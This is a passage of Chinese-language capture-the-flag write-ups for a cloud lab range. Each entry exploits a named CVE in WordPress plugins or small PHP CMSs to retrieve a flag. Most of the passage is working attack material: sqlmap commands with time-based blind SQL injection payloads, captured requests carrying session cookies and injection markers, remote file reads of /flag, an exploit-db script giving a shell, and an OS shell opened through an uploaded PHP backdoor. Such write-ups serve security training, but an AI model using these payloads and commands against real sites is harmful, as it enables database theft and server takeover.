[11:06:47] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://eci-2ze7fshs6k2i9cunesl6.cloudeci1.ichunqiu.com:80/tmpbenko.php
[11:06:47] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> cat /flag
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'flag{34d205b4-f540-4307-b7d1-470af614e7a8}'
os-shell>
CVE-2021-24762
靶标介绍:
WordPress Plugin Perfect Survey 注入
0x01 sqlmap直接跑
$ sqlmap -u "http://eci-2zeapy22mzkhfy9ses8g.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=get_question&question_id=1%20*%22%20" -D cms -T flag -C flag --dump --time-sec 2 --technique=T
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:34:06 /2023-06-12/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[02:34:07] [INFO] resuming back-end DBMS 'mysql'
[02:34:07] [INFO] testing connection to the target URL
[02:34:10] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
you have not declared cookie(s), while server wants to set its own ('wp-ps-session=rddjj93ndje...blvbonsq55'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://eci-2zeapy22mzkhfy9ses8g.cloudeci1.ichunqiu.com:80/wp-admin/admin-ajax.php?action=get_question&question_id=1 AND (SELECT 3797 FROM (SELECT(SLEEP(2)))SQLk)-- fFLL"
---
[02:34:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[02:34:13] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'cms'
[02:34:13] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'cms'
[02:34:13] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[02:34:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[02:34:25] [WARNING] reflective value(s) found and filtering out of statistical model, please wait
.............................. (done)
flag{b2567224-88ca-4be2-a
[02:38:17] [ERROR] invalid character detected. retrying..
c79-30e9dc90232d}
Database: cms
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{b2567224-88ca-4be2-ac79-30e9dc90232d} |
+--------------------------------------------+
[02:40:43] [INFO] table 'cms.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2zeapy22mzkhfy9ses8g.cloudeci1.ichunqiu.com/dump/cms/flag.csv'
[02:40:43] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 416 times
[02:40:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zeapy22mzkhfy9ses8g.cloudeci1.ichunqiu.com'
[*] ending @ 02:40:43 /2023-06-12/
CVE-2022-23366
靶标介绍:
Hospital Management Startup 1.0 sqli
0x01 登陆界面http://url/patientlogin.php抓包,sqlmap直接跑
┌──(kali㉿kali)-[~]
└─$ sqlmap -r hms-sql.txt --dbms mysql --time-sec 2 --technique=T -D ctf -T flag --dump
___
__H__
___ ___["]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:06:09 /2023-06-12/
[23:06:09] [INFO] parsing HTTP request from 'hms-sql.txt'
[23:06:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: loginid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: loginid=dsaf' AND (SELECT 3916 FROM (SELECT(SLEEP(2)))heZo) AND 'ETaW'='ETaW&password=safd&submit=Login
---
[23:06:15] [INFO] testing MySQL
[23:06:15] [INFO] confirming MySQL
[23:06:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.20
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[23:06:15] [INFO] fetching columns for table 'flag' in database 'ctf'
[23:06:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[23:06:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[23:06:23] [INFO] retrieved: flag
[23:06:53] [INFO] fetching entries for table 'flag' in database 'ctf'
[23:06:53] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[23:06:53] [INFO] retrieved: 1
[23:06:57] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{ded9bf56-67a7-4110-956e-92a60c9eda4e}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{ded9bf56-67a7-4110-956e-92a60c9eda4e} |
+--------------------------------------------+
[23:12:52] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze3tqb83gvdso4qm9rj.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[23:12:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze3tqb83gvdso4qm9rj.cloudeci1.ichunqiu.com'
[*] ending @ 23:12:52 /2023-06-12/
CVE-2022-0788
靶标介绍:
wordpress插件 WP Fundraising Donation and Crowdfunding Platform < 1.5.0 的其中一个REST路由在SQL语句使用时没有对参数进行过滤,导致SQL注入漏洞。
0x01 sqlmap直接跑
sqlmap -u http://eci-2zeh5tiqqmbja36mgght.cloudeci1.ichunqiu.com/index.php?rest_route=/xs-donate-form/payment-redirect/3 -v 3 --dbms mysql --method=Get --data '{"id":"(*","formid":"1","type":"online_payment"}' --test-filter="MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)" --time-sec 2 -D ctf -T flag --dump
CVE-2020-5515
靶标介绍:
Gila CMS 1.11.8 /admin/sql?query= 存在sql注入
0x01 先用admin@admin.com admin登录
0x01 抓包直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ cat gils-cms-sql.txt
GET /admin/sql?query=3 HTTP/1.1
Host: eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=tnv9hgmhq64jmfrpkea6ktrkn8; GSESSIONID=1s9mvmd4hxo847ain0n40xp074iwwcup7g2g9uvr8um39ucz1v
Upgrade-Insecure-Requests: 1
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r gils-cms-sql.txt --dbms mysql --file-read /flag
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:25:11 /2023-06-13/
[10:25:11] [INFO] parsing HTTP request from 'gils-cms-sql.txt'
[10:25:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
Type: inline query
Title: Generic inline queries
Payload: query=(SELECT CONCAT(CONCAT(0x71627a7171,(CASE WHEN (6770=6770) THEN 0x31 ELSE 0x30 END)),0x716b787671))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: query=(SELECT 4216 FROM (SELECT(SLEEP(5)))GiUI)
---
[10:25:11] [INFO] testing MySQL
[10:25:11] [INFO] confirming MySQL
[10:25:11] [WARNING] reflective value(s) found and filtering out
[10:25:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[10:25:11] [INFO] fingerprinting the back-end DBMS operating system
[10:25:12] [INFO] the back-end DBMS operating system is Linux
[10:25:12] [INFO] fetching file: '/flag'
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[10:25:14] [INFO] retrieved: '42'
[10:25:14] [INFO] the local file '/home/kali/.local/share/sqlmap/output/eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com/files/_flag (same file)
[10:25:14] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com'
[*] ending @ 10:25:14 /2023-06-13/
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /home/kali/.local/share/sqlmap/output/eci-2zebv8ibalnt1m9j7acj.cloudeci1.ichunqiu.com/files/_flag
flag{8e9404fc-7b11-4240-8724-22b76b0816b2}
CVE-2020-19961
靶标介绍:
zz cms 2019 subzs.php 存在sql注入漏洞
正确的答案应该是:https://blog.csdn.net/weixin_36325615/article/details/115512796
0x01 抓包,sqlmap直接跑
POST /admin/badip_add.php?action=add HTTP/1.1
Host: eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com/admin/badip_add.php
Cookie: admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; tablename=zzcms_zsclass
Upgrade-Insecure-Requests: 1
ip=1.1.1.1&dose=&Submit=%E6%8F%90%E4%BA%A4
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r zzcms-sql1.txt --tech T --dbms mysql --time-sec 2 --file-read /flag
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:41:43 /2023-06-13/
[11:41:43] [INFO] parsing HTTP request from 'zzcms-sql1.txt'
[11:41:44] [WARNING] provided value for parameter 'dose' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:41:44] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'showbad.php'. Do you want to apply it from now on? [Y/n] n
[11:41:45] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ip (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: ip=1.1.1.1' RLIKE SLEEP(2) AND 'Aczf'='Aczf&dose=&Submit=%E6%8F%90%E4%BA%A4
---
[11:41:45] [INFO] testing MySQL
[11:41:45] [INFO] confirming MySQL
[11:41:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:41:45] [INFO] fingerprinting the back-end DBMS operating system
[11:41:45] [INFO] the back-end DBMS operating system is Linux
[11:41:45] [INFO] fetching file: '/flag'
[11:41:45] [INFO] resuming partial value: 666C
[11:41:45] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[11:41:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
61677B31303733356563332D643032392D346162382D386236642D3266643139343639643565617D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[11:48:10] [INFO] retrieved: 42
[11:48:18] [INFO] the local file '/home/kali/.local/share/sqlmap/output/eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com/files/_flag (same file)
[11:48:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com'
[*] ending @ 11:48:18 /2023-06-13/
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /home/kali/.local/share/sqlmap/output/eci-2ze9clflsbyadm3ujhri.cloudeci1.ichunqiu.com/files/_flag
flag{10735ec3-d029-4ab8-8b6d-2fd19469d5ea}
CVE-2019-13275
靶标介绍:
WordPress VeronaLabs wp-statistics插件12.6.7之前版本中的v1/hit端点存在SQL注入漏洞。
0x01 sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://eci-2ze2rdxwpdox7i6lo3in.cloudeci1.ichunqiu.com/wp-json/wpstatistics/v1/hit --data 'wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=*' --dbms mysql --level 5 --risk 3 --tech T --time-sec 2 -D ctf -T flag --dump
___
__H__
___ ___[.]_____ ___ ___ {1.7.2#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:23:41 /2023-06-14/
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
[09:23:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=' AND (SELECT 4306 FROM (SELECT(SLEEP(2)))erdg)-- QvZa
---
[09:23:43] [INFO] testing MySQL
[09:23:43] [INFO] confirming MySQL
[09:23:43] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[09:23:43] [INFO] fetching columns for table 'flag' in database 'ctf'
[09:23:43] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[09:23:49] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[09:23:52] [INFO] retrieved: flag
[09:24:23] [INFO] fetching entries for table 'flag' in database 'ctf'
[09:24:23] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[09:24:23] [INFO] retrieved: 1
[09:24:26] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{daec2592-5eed-4b8e-ade4-9a875aec5761}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{daec2592-5eed-4b8e-ade4-9a875aec5761} |
+--------------------------------------------+
[09:30:25] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze2rdxwpdox7i6lo3in.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[09:30:25] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze2rdxwpdox7i6lo3in.cloudeci1.ichunqiu.com'
[*] ending @ 09:30:25 /2023-06-14/
CVE-2019-13086
靶标介绍:
CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.2版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
https://github.com/cskaza/cszcms/issues/19
0x01 参照github作者的payload,设计包,然后自己搞paylaod
POST包:
POST /member/login/check HTTP/1.1 Host: eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com User-agent: '-(if((length((select name from user_admin limit 1))=10),*,1))-'', '127.0.0.1','time') # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-language: en-US,en;q=0.5 Accept-encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Origin: http://eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com Referer: http://eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com/member/login/check Cookie: cszcookie_13ce2195719b0c1a0c3415bd2b6ab2ffcsrf_cookie_csz=878d5c0937e2416e640bb5df6b728f7e; eci-2zeef04blsrc0lh3gu9e_cloudeci1_ichunqiu_com_cszsess=nmlp7hqumacupvm4nsphbn6vf9o8fln4 Upgrade-Insecure-Requests: 1 Content-Length: 34 Connection: close email=111@111.com&password=111
sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r csz1.2.2_sql.txt --tech T --dbms mysql --time-sec 2 --test-filter 'MySQL (MyPayload) SLEEP[5]' -D cms -T flag --dump
___
__H__
___ ___["]_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:50:03 /2023-06-14/
[10:50:03] [INFO] parsing HTTP request from 'csz1.2.2_sql.txt'
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
Cookie parameter 'cszcookie_13ce2195719b0c1a0c3415bd2b6ab2ffcsrf_cookie_csz' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[10:50:07] [INFO] testing connection to the target URL
[10:50:08] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-agent #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL (MyPayload) SLEEP[5]
Payload: '-(if((length((select name from user_admin limit 1))=10), SLEEP(2),1))-'', '127.0.0.1','time') #
---
[10:50:08] [INFO] testing MySQL
[10:50:08] [INFO] confirming MySQL
[10:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:50:08] [INFO] fetching columns for table 'flag' in database 'cms'
[10:50:08] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[10:50:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
2
[10:50:16] [INFO] retrieved: id
[10:50:30] [INFO] retrieved: flag
[10:50:58] [INFO] fetching entries for table 'flag' in database 'cms'
[10:50:58] [INFO] fetching number of entries for table 'flag' in database 'cms'
[10:50:58] [INFO] retrieved: 1
[10:51:01] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{a031e81f-576a-49ea-9042-1e58afc2a442}
[10:57:00] [INFO] retrieved: 1
Database: cms
Table: flag
[1 entry]
+----+--------------------------------------------+
| id | flag |
+----+--------------------------------------------+
| 1 | flag{a031e81f-576a-49ea-9042-1e58afc2a442} |
+----+--------------------------------------------+
[10:57:05] [INFO] table 'cms.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com/dump/cms/flag.csv'
[10:57:05] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 492 times
[10:57:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zeef04blsrc0lh3gu9e.cloudeci1.ichunqiu.com'
[*] ending @ 10:57:05 /2023-06-14/
CVE-2021-41402
靶标介绍:
flatCore-CMS v2.0.8 存在后台任意代码执行漏洞
https://www.exploit-db.com/exploits/50262
0x01 把exp下载回来直接上
┌──(kali㉿kali)-[~/Desktop]
└─$ python flatcore.py http://eci-2ze44g3v7edfrx4kqrf6.cloudeci1.ichunqiu.com admin 12345678
Logged in
$ whoami
www-data
$ cat /flag
flag{1d70adcd-1cc2-4025-ac82-369addbaa0f9}
$
CVE-2022-0410
靶标介绍:
WordPress plugin The WP Visitor Statistics (Real Time Traffic) 5.6 之前存在SQL注入漏洞,该漏洞源于 refUrlDetails AJAX 不会清理和转义 id 参数。 登陆账户:user01/user01
0x01 先登陆抓包
0x02 sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r wp-sql.txt --dbms mysql --test-filter='MySQL MyPayload (SLEEP)' --tech T --time-sec 2 -D ctf -T flag --dump
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:45:43 /2023-06-16/
[23:45:43] [INFO] parsing HTTP request from 'wp-sql.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[23:48:32] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:48:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL MyPayload (SLEEP)
Payload: http://eci-2ze6p6jlhlj373ih0kge.cloudeci1.ichunqiu.com:80/wp-admin/admin-ajax.php?action=refUrlDetails&id= SLEEP(2)
---
[23:48:32] [INFO] testing MySQL
[23:48:32] [INFO] confirming MySQL
[23:48:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[23:48:32] [INFO] fetching columns for table 'flag' in database 'ctf'
[23:48:32] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[23:48:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[23:48:43] [INFO] retrieved: flag
[23:49:37] [INFO] fetching entries for table 'flag' in database 'ctf'
[23:49:37] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[23:49:37] [INFO] retrieved: 1
[23:49:42] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{a5eb6e6e-243e-4f2a-bf81-d057c9630bdd}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{a5eb6e6e-243e-4f2a-bf81-d057c9630bdd} |
+--------------------------------------------+
[00:01:19] [INFO] table 'ctf.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze6p6jlhlj373ih0kge.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[00:01:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze6p6jlhlj373ih0kge.cloudeci1.ichunqiu.com'
[*] ending @ 00:01:19 /2023-06-17/
CVE-2022-0784
靶标介绍:
wordpress插件 Title Experiments Free < 9.0.1 没有对用户输入进行过滤和转义,导致了SQL注入。
https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
0x01 sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u 'http://eci-2zeiglmgxyblh0ok38vs.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php' --data 'action=wpex_titles&id[]=1*' --dbms mysql --tech T --test-filter 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' --time-sec 2 -D ctf -T flag --dump
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 03:10:01 /2023-06-17/
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
[03:10:03] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=b18b3e2845c...130df81049'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=wpex_titles&id[]=1 AND (SELECT 3794 FROM (SELECT(SLEEP(2)))UpWn)
---
[03:10:04] [INFO] testing MySQL
[03:10:04] [INFO] confirming MySQL
[03:10:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:10:04] [INFO] fetching columns for table 'flag' in database 'ctf'
[03:10:04] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[03:10:12] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[03:10:15] [INFO] retrieved: flag
[03:10:47] [INFO] fetching entries for table 'flag' in database 'ctf'
[03:10:47] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[03:10:47] [INFO] retrieved: 1
[03:10:51] [WARNING] reflective value(s) found and filtering out of statistical model, please wait
.............................. (done)
flag{39a9ee89-f742-46aa-94b8-248a
[03:16:33] [ERROR] invalid character detected. retrying..
0b238eef}
[03:17:59] [ERROR] invalid character detected. retrying..
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{39a9ee89-f742-46aa-94b8-248a0b238eef} |
CVE-2022-0948
靶标介绍:
WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞
https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
0x01 抓包后,sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r wp-sql.txt --dbms mysql --test-filter='MySQL MyPayload (SLEEP)' --tech T --time-sec 3 -D ctf -T flag --dump
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 03:35:45 /2023-06-17/
[03:35:45] [INFO] parsing HTTP request from 'wp-sql.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[03:35:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON #1* ((custom) POST)
Type: time-based blind
Title: MySQL MyPayload (SLEEP)
Payload: {"id":" (SELECT SLEEP(3))#"}
---
[03:35:48] [INFO] testing MySQL
[03:36:05] [INFO] confirming MySQL
[03:36:05] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:36:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:36:13] [INFO] fetching columns for table 'flag' in database 'ctf'
[03:36:13] [INFO] retrieved: 1
[03:36:20] [INFO] retrieved: flag
[03:37:11] [INFO] fetching entries for table 'flag' in database 'ctf'
[03:37:11] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[03:37:11] [INFO] retrieved: 1
[03:37:17] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{74aab8
[03:40:16] [ERROR] invalid character detected. retrying..
56-d9cc-417b-bc1a-4
[03:45:20] [ERROR] invalid character detected. retrying..
7
[03:45:44] [ERROR] invalid character detected. retrying..
3e04cdfb1f}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{74aab856-d9cc-417b-bc1a-473e04cdfb1f} |
+--------------------------------------------+
CVE-2022-1014
靶标介绍:
wordpress插件 WP Contacts Manager <= 2.2.4 对用户输入的转义不够充分,导致了SQL注入。
0x01 抓包,sqlmap直接跑
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r wp-sql.txt --dbms mysql --level 5 --risk 3 --tech U -D ctf -T flag --dump
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:21:09 /2023-06-17/
[04:21:09] [INFO] parsing HTTP request from 'wp-sql.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[04:21:12] [INFO] testing connection to the target URL
